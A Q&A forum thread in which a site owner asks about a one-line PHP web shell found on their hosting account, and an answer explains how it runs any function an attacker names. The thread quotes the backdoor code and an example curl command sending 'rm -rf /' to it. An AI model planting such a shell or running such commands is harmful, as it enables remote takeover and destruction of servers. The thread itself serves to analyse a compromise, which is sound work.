Mikerobenics
Reputation: 225
Just found malicious PHP code
I found malicious php file on my hosting account with this code:
<?=$_GET[0]($_POST[1]);?>
Please help me to better understand this code, what is the possibilities of this code for uploader?
Thanks in advance.
Upvotes: 3
Views: 117
Answers (1)
deceze
Reputation: 522175
$func = 'strlen';
$arg = 'foo';
echo $func($arg); // output: 3
You're looking at a variable function invocation. Just in your case the function name comes from the query string in the URL and the argument from the HTTP POST body. So, this can execute anything at all. Likely somebody will try to use it to execute shell code via exec.
E.g.:
$ curl example.com/infected_file.php?exec -d 'rm%20-rf%20/'
(Not 100% sure this would do it as is and I don't feel like trying, but you get the idea.)
Upvotes: 6
Related Questions
- Server Hack - Random Code added tot he top of PHP files
- Wordpress - Found malicious PHP code
- I have been hacked, now I have a weird PHP file. What is it doing?
- Strange PHP code found in file on server
- A suspected code uploaded in my website
- A suspicious PHP file might
- Devil-Shell code injected into my site
- Malicious PHP code injected into a PHP file
- Found This Hack in my web server php files
- Malicious code and PHP